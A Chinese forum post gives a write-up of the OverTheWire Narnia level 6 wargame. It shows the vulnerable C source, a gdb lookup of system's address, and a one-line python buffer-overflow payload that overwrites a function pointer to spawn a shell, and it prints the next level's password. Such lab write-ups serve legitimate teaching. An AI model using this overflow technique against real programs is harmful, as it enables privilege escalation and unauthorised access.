-
-
[原创]WarGame-narnia6 解题思路
-
2019-7-31 16:28 6982
-
Narnia6源码如下
/* This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA */ #include <stdio.h> #include <stdlib.h> #include <string.h> extern char **environ; // tired of fixing values... // - morla unsigned long get_sp(void) { __asm__("movl %esp,%eax\n\t" "and $0xff000000, %eax" ); } int main(int argc, char *argv[]){ char b1[8], b2[8]; int (*fp)(char *)=(int(*)(char *))&puts, i; if(argc!=3){ printf("%s b1 b2\n", argv[0]); exit(-1); } /* clear environ */ for(i=0; environ[i] != NULL; i++) memset(environ[i], '\0', strlen(environ[i])); /* clear argz */ for(i=3; argv[i] != NULL; i++) memset(argv[i], '\0', strlen(argv[i])); strcpy(b1,argv[1]); strcpy(b2,argv[2]); //if(((unsigned long)fp & 0xff000000) == 0xff000000) if(((unsigned long)fp & 0xff000000) == get_sp()) exit(-1); setreuid(geteuid(),geteuid()); fp(b1); exit(1); }
开始以为可以和narnia2一样用nop滑板的方法执行shellcode,结果看到了前面的get_sp和后面的fp做比较(NX),放弃了,通过输入格式化字符串发现可以泄露地址,但是和narnia5不同的是,这一题并没有直接执行’/bin/sh’,当看到程序在退出之前做了’fp(b1)’,就差不多知道了,应该是修改fp指向system函数,修改b1为’sh’;当务之急是找到system函数所在的地址,得用gdb调一下,结果如下
narnia6@narnia:/narnia$ gdb -q narnia6 Reading symbols from narnia6...(no debugging symbols found)...done. (gdb) b main Breakpoint 1 at 0x80485ac (gdb) r Starting program: /narnia/narnia6 Breakpoint 1, 0x080485ac in main () (gdb) p system $1 = {<text variable, no debug info>} 0xf7e4c850 <system> (gdb)
这应该是得到system函数最简单的方法了(一般的都要自己找libc算偏移o(╥﹏╥)o),最终的结果如下
narnia6@narnia:/narnia$ ./narnia6 $(python -c 'print "sh;#"+"a"*4+"\x50\xc8\xe4\xf7"') aa $ whoami narnia7 $ cat /etc/narnia_pass/narnia7 ahkiaziphu $
小结
这是wargame的IRC链接
irc.overthewire.org
房间是#wargames,欢迎大家前来交流(主要是问问题和回答问题),目前房间里主要是歪果仁,所以还能训练英语水平o(* ̄︶ ̄*)o
附件是可执行代码和源码
阿里云助力开发者!2核2G 3M带宽不限流量!6.18限时价,开 发者可享99元/年,续费同价!
赞赏
他的文章
谁下载
无
谁下载
无
看原图